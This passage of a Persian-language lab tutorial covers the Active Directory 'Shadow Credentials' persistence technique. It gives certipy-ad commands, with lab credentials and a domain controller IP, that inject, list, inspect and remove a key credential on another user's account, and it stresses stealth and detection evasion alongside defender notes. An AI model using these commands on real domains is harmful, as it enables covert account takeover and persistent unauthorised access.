              \u0627\u06cc\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u0630\u062e\u06cc\u0631\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f \u0648 \u062f\u0631 \u0641\u0631\u0622\u06cc\u0646\u062f \u0648\u0631\u0648\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Kerberos PKINIT \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f. \u0627\u06cc\u0646 \u0631\u0648\u0634:<\/span><\/p>\n
                \n
              • \u0645\u0642\u0627\u0648\u0645 \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0631\u06cc\u0633\u062a \u0631\u0645\u0632 \u0639\u0628\u0648\u0631<\/strong><\/span><\/li>\n
              • \u067e\u0646\u0647\u0627\u0646 \u0648 \u0646\u0627\u0634\u0646\u0627\u0633<\/strong><\/span><\/li>\n
              • \u0648 \u0628\u0633\u06cc\u0627\u0631 \u0645\u0624\u062b\u0631 \u0628\u0631\u0627\u06cc \u062d\u0641\u0638 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0644\u0646\u062f\u0645\u062f\u062a<\/strong> \u0627\u0633\u062a.<\/span><\/li>\n<\/ul>\n
                \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u0645\u0627\u060c \u0628\u0631\u0627\u06cc \u062a\u062b\u0628\u06cc\u062a \u062d\u0636\u0648\u0631 \u0648 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc\u060c \u06cc\u06a9 Shadow Credential \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 shivam \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645\u060c \u0628\u0627 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0627\u0646\u0633\u062a\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 shivam\u060c \u0628\u0647 \u062d\u0633\u0627\u0628 \u0627\u0648 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0648\u0627\u0631\u062f \u0634\u0648\u06cc\u0645.<\/span><\/p>\n
                \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc: \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u06a9\u0647 \u062f\u0631 \u062f\u0633\u062a\u0647 \u062d\u0645\u0644\u0627\u062a ESC9\/ESC10 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f\u060c \u0628\u0633\u06cc\u0627\u0631 \u067e\u0646\u0647\u0627\u0646\u200c\u06a9\u0627\u0631\u0627\u0646\u0647 \u0627\u0633\u062a\u060c \u0627\u06a9\u062b\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u0634\u062e\u06cc\u0635 \u0633\u0646\u062a\u06cc \u0631\u0627 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0632\u0646\u062f \u0648 \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0631\u06cc\u0633\u062a \u06a9\u0631\u062f\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u06cc\u0632 \u0645\u0627\u0646\u062f\u06af\u0627\u0631 \u0628\u0627\u0642\u06cc \u0645\u06cc\u200c\u0645\u0627\u0646\u062f\u2014\u0645\u06af\u0631 \u0627\u06cc\u0646\u06a9\u0647 \u0635\u0631\u0627\u062d\u062a\u0627\u064b \u062d\u0630\u0641 \u0634\u0648\u062f.<\/span><\/p>\n
                \u0627\u0641\u0632\u0648\u062f\u0646 \u06cc\u06a9<\/strong> Shadow Credential<\/strong><\/span><\/p>\n
                certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam add<\/span><\/pre>\n
                \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u06a9 \u06a9\u0644\u06cc\u062f \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u062c\u062f\u06cc\u062f \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0627 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u06a9\u0627\u0631\u0628\u0631 shivam \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u0627\u0641\u0632\u0648\u062f\u0646\u060c \u0627\u06cc\u0646 \u06a9\u0644\u06cc\u062f \u0627\u0645\u06a9\u0627\u0646 \u0648\u0631\u0648\u062f \u0628\u062f\u0648\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 shivam \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f\u2014\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u0627\u0646\u0646\u062f PKINIT.<\/span><\/p>\n
                \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0648 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u06cc\u062f \u062a\u0632\u0631\u06cc\u0642\u200c\u0634\u062f\u0647\u060c \u0628\u0627\u0631\u0647\u0627 \u0648 \u0628\u062f\u0648\u0646 \u062c\u0644\u0628 \u062a\u0648\u062c\u0647 \u0648\u0627\u0631\u062f \u0633\u06cc\u0633\u062a\u0645 \u0634\u0648\u062f\u2014\u06a9\u0647 \u0627\u06cc\u0646 \u06cc\u06a9\u06cc \u0627\u0632 \u0642\u062f\u0631\u062a\u0645\u0646\u062f\u062a\u0631\u06cc\u0646 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc post-exploitation \u062f\u0631 Active Directory \u0627\u0633\u062a.<\/span><\/p>\n
                \"\"<\/span><\/p>\n
                \u0646\u06a9\u062a\u0647: \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0633\u062a\u0647\u200c\u06cc \u0627\u0635\u0644\u06cc \u062d\u0645\u0644\u0647 ESC10 \u0628\u0647\u200c\u0634\u0645\u0627\u0631 \u0645\u06cc\u200c\u0631\u0648\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u062a\u0632\u0631\u06cc\u0642 \u06cc\u06a9 \u06a9\u0644\u06cc\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 \u062f\u06cc\u06af\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u062f\u0632\u062f\u06cc\u062f\u0646 \u06cc\u0627 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u0628\u0627\u0634\u062f. Shadow Credential\u0647\u0627 \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u06cc\u0632 \u0628\u0627\u0642\u06cc \u0645\u06cc\u200c\u0645\u0627\u0646\u0646\u062f \u0648 \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u062f\u0631 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af \u0633\u0646\u062a\u06cc \u0644\u0627\u06af \u0646\u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u062a\u0646\u0647\u0627 \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u0634\u0648\u0646\u062f \u06a9\u0647 \u0635\u0631\u0627\u062d\u062a\u0627\u064b \u0628\u0631\u0631\u0633\u06cc \u0634\u062f\u0647 \u0628\u0627\u0634\u0646\u062f.<\/span><\/p>\n
                \u0641\u0647\u0631\u0633\u062a \u06a9\u0631\u062f\u0646<\/strong> Shadow Credential<\/strong>\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f<\/strong><\/span><\/p>\n
                \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u0686\u0647 Shadow Credential\u0647\u0627\u06cc\u06cc \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u0628\u0647 \u062d\u0633\u0627\u0628 shivam \u0645\u062a\u0635\u0644 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0645\u0627\u0645 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc \u062f\u0633\u062a\u06af\u0627\u0647 (Device IDs) \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u0631\u0627 \u0644\u06cc\u0633\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n
                certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam list<\/span><\/pre>\n
                \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u062a\u062d\u0644\u06cc\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646\u060c \u06a9\u0634\u0641 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627 \u06cc\u0627 \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642\u200c\u0634\u062f\u0647 \u062f\u0631 \u0641\u0627\u0632 \u067e\u0633 \u0627\u0632 \u062d\u0645\u0644\u0647 (Post-Exploitation) \u0628\u0633\u06cc\u0627\u0631 \u062d\u06cc\u0627\u062a\u06cc \u0647\u0633\u062a\u0646\u062f.<\/span><\/p>\n
                \u062f\u0631 \u0645\u062c\u0645\u0648\u0639\u060c \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u06a9\u06cc \u0627\u0632 \u06a9\u0644\u06cc\u062f\u06cc\u200c\u062a\u0631\u06cc\u0646 \u06af\u0627\u0645\u200c\u0647\u0627 \u062f\u0631 \u062d\u0641\u0638 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a\u060c \u0686\u0631\u0627 \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0631\u0627 \u0642\u0627\u062f\u0631 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u062a\u0627 \u0628\u062f\u0648\u0646 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u0642\u0627\u0628\u0644\u200c\u0645\u0634\u0627\u0647\u062f\u0647\u200c\u0627\u06cc \u062f\u0631 \u0631\u0641\u062a\u0627\u0631 \u062d\u0633\u0627\u0628\u060c \u0628\u0647 \u062d\u0636\u0648\u0631 \u0645\u062e\u0641\u06cc \u062e\u0648\u062f \u0627\u062f\u0627\u0645\u0647 \u062f\u0647\u062f.<\/span><\/p>\n
                \"\"<\/span><\/p>\n
                \u0646\u06a9\u062a\u0647: \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u0647\u0631 \u062f\u0648 \u06af\u0631\u0648\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 (Red Team) \u0648 \u0645\u062f\u0627\u0641\u0639\u0627\u0646 (Blue Team) \u0627\u0631\u0632\u0634\u0645\u0646\u062f \u0627\u0633\u062a:<\/span><\/p>\n
                  \n
                • \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc \u06cc\u0627 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u062b\u0628\u062a Shadow Credential \u062a\u06a9\u0631\u0627\u0631\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.<\/span><\/li>\n
                • \u0645\u062f\u0627\u0641\u0639\u0627\u0646 \u0646\u06cc\u0632 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0627\u0636\u0627\u0641\u0647\u200c\u0634\u062f\u0647 \u067e\u0633 \u0627\u0632 \u0646\u0641\u0648\u0630 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062a\u062d\u0644\u06cc\u0644 \u06a9\u0646\u0646\u062f\u2014\u0686\u06cc\u0632\u06cc \u06a9\u0647 \u0628\u0627 \u0646\u06cc\u0627\u0632\u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u062a\u062d\u0642\u06cc\u0642\u0627\u062a \u062c\u0631\u0645\u200c\u0634\u0646\u0627\u0633\u06cc (Forensics) \u062f\u0631 \u0639\u0645\u0644\u06cc\u0627\u062a \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632 \u0648 \u0622\u0628\u06cc \u0647\u0645\u200c\u0631\u0627\u0633\u062a\u0627 \u0627\u0633\u062a.<\/span><\/li>\n<\/ul>\n
                  \u0628\u0631\u0631\u0633\u06cc \u06cc\u06a9<\/strong> Shadow Credential <\/strong>\u062e\u0627\u0635<\/strong><\/span><\/p>\n
                  \u0628\u0631\u0627\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062f\u0642\u06cc\u0642 \u062f\u0631 \u0645\u0648\u0631\u062f \u06cc\u06a9 Shadow Credential \u062e\u0627\u0635 \u06a9\u0647 \u0628\u0647 \u062d\u0633\u0627\u0628 shivam \u0645\u062a\u0635\u0644 \u0627\u0633\u062a\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u062c\u0632\u0626\u06cc\u0627\u062a\u06cc \u0645\u0627\u0646\u0646\u062f:<\/span><\/p>\n
                    \n
                  • \u0634\u0646\u0627\u0633\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 (Device ID)<\/span><\/li>\n
                  • \u0635\u0627\u062f\u0631\u06a9\u0646\u0646\u062f\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 (Issuer)<\/span><\/li>\n
                  • \u062a\u0627\u0631\u06cc\u062e \u0648 \u0632\u0645\u0627\u0646 \u0627\u0636\u0627\u0641\u0647 \u0634\u062f\u0646 \u06a9\u0644\u06cc\u062f<\/span>
                    \n\u0631\u0627 \u0646\u0645\u0627\u06cc\u0634 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><\/li>\n<\/ul>\n
                    certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id 528c42e7-1395-e86c-4b06-fffd9758fe6b info<\/span><\/pre>\n
                    \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0642\u06cc\u0642\u06cc \u0628\u0631 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc \u0645\u062e\u0641\u06cc\u200c\u0634\u062f\u0647 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f\u060c \u0648 \u0628\u0647 \u0645\u062f\u0627\u0641\u0639\u0627\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062a\u062d\u0644\u06cc\u0644 \u06a9\u0646\u0646\u062f\u2014\u0628\u0647\u200c\u0648\u06cc\u0698\u0647 \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 PKINIT \u0648 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062c\u0639\u0644\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0644\u0646\u062f\u0645\u062f\u062a \u0648 \u0628\u06cc\u200c\u0635\u062f\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.<\/span><\/p>\n
                    \"\"<\/span><\/p>\n
                    \u0646\u06a9\u062a\u0647: \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0646\u0634\u0627\u0646 \u062f\u0647\u062f \u06a9\u0647 \u0622\u06cc\u0627 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647 (Credential) \u0628\u0647\u200c\u062a\u0627\u0632\u06af\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647\u060c \u0628\u0627 \u0686\u0647 \u0631\u0648\u0634\u06cc \u0627\u0636\u0627\u0641\u0647 \u0634\u062f\u0647\u060c \u0648 \u062a\u0648\u0633\u0637 \u0686\u0647 \u0645\u0647\u0627\u062c\u0645\u06cc \u0648\u0627\u0631\u062f \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u062f\u0631\u06a9 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u0633\u0627\u062e\u062a \u062e\u0637 \u0632\u0645\u0627\u0646\u06cc \u0648\u0642\u0627\u06cc\u0639 \u0627\u0645\u0646\u06cc\u062a\u06cc (Forensic Timeline) \u062f\u0631 \u062d\u06cc\u0646 \u067e\u0627\u0633\u062e \u0628\u0647 \u062d\u0627\u062f\u062b\u0647 (Incident Response) \u062d\u06cc\u0627\u062a\u06cc \u0627\u0633\u062a.<\/span><\/p>\n
                    \u062d\u0630\u0641 \u06cc\u06a9<\/strong> Shadow Credential<\/strong><\/span><\/p>\n
                    \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0628\u062e\u0648\u0627\u0647\u06cc\u0645 \u06cc\u06a9 Shadow Credential \u062e\u0627\u0635 \u0631\u0627 \u0627\u0632 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc shivam \u062d\u0630\u0641 \u06a9\u0646\u06cc\u0645 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u062c\u0647\u062a \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u067e\u0633 \u0627\u0632 \u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u06cc\u0627 \u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u0645\u0647\u0627\u062c\u0645)\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645:<\/span><\/p>\n
                    certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id 528c42e7-1395-e86c-4b06-fffd9758fe6b clear<\/span><\/pre>\n
                    \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06a9\u0644\u06cc\u062f \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u062a\u0632\u0631\u06cc\u0642\u200c\u0634\u062f\u0647 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u06a9\u0627\u0631\u0628\u0631 \u0631\u0627 \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0641\u0631\u0622\u06cc\u0646\u062f \u0628\u062e\u0634\u06cc \u0627\u0632 \u0639\u0645\u0644\u06cc\u0627\u062a \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc (Cleanup) \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc Red Team \u06cc\u0627 \u067e\u0627\u0633\u062e \u0628\u0647 \u0646\u0641\u0648\u0630 \u0648\u0627\u0642\u0639\u06cc \u0627\u0633\u062a.<\/span><\/p>\n
                    \u062a\u0623\u06cc\u06cc\u062f \u062d\u0630\u0641<\/strong> Credential<\/strong><\/span><\/p>\n
                    \u0628\u0631\u0627\u06cc \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0627\u0632 \u0627\u06cc\u0646\u200c\u06a9\u0647 \u06a9\u0644\u06cc\u062f \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u062d\u0630\u0641 \u0634\u062f\u0647 \u0648 \u0647\u06cc\u0686 Shadow Credential \u062f\u06cc\u06af\u0631\u06cc \u0628\u0627 \u0647\u0645\u0627\u0646 \u0634\u0646\u0627\u0633\u0647 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u0645\u062c\u062f\u062f\u0627\u064b \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n
                    certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id 528c42e7-1395-e86c-4b06-fffd9758fe6b info<\/span><\/pre>\n
                    \u062f\u0631 \u0635\u0648\u0631\u062a \u0645\u0648\u0641\u0642\u06cc\u062a\u060c \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u0627 \u0647\u06cc\u0686 \u062e\u0631\u0648\u062c\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f \u06cc\u0627 \u067e\u06cc\u0627\u0645 \u0639\u062f\u0645 \u0648\u062c\u0648\u062f \u06a9\u0644\u06cc\u062f (Not Found) \u0631\u0627 \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f. \u0627\u06cc\u0646 \u062a\u0623\u06cc\u06cc\u062f\u06cc\u0647 \u0628\u0631\u0627\u06cc \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0627\u0632 \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u06a9\u0627\u0645\u0644 \u0648 \u062d\u0630\u0641 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0627\u0632 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0645\u0648\u0631\u062f\u0646\u0638\u0631 \u0636\u0631\u0648\u0631\u06cc \u0627\u0633\u062a.<\/span><\/p>\n
                    \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u0627\u0647\u0645\u06cc\u062a \u0645\u062f\u06cc\u0631\u06cc\u062a \u062f\u0642\u06cc\u0642 Shadow Credential\u0647\u0627 \u062f\u0631 \u0647\u0631 \u062f\u0648 \u0641\u0627\u0632 Post-Exploitation \u0648 Incident Response \u0627\u0633\u062a\u060c \u0648 \u0628\u062e\u0634\u06cc \u062c\u062f\u0627\u0646\u0634\u062f\u0646\u06cc \u0627\u0632 \u062a\u062d\u0644\u06cc\u0644 \u062a\u0647\u062f\u06cc\u062f\u0627\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 AD CS \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
                    \"\"<\/span><\/p>\n
                    \u0646\u06a9\u062a\u0647:<\/span>
                    \nShadow Credential\u0647\u0627 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u062f\u0631 \u0645\u0631\u062d\u0644\u0647 \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (Post-Exploitation) \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f \u062a\u0627 \u0645\u0647\u0627\u062c\u0645 \u0628\u062a\u0648\u0627\u0646\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0627\u0646\u0633\u062a\u0646 \u06cc\u0627 \u0631\u06cc\u0633\u062a \u06a9\u0631\u062f\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u06cc\u0627 \u0628\u062f\u0648\u0646 \u0627\u0628\u0637\u0627\u0644 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0686\u0646\u062f\u0645\u0631\u062d\u0644\u0647\u200c\u0627\u06cc (MFA)\u060c \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/span>
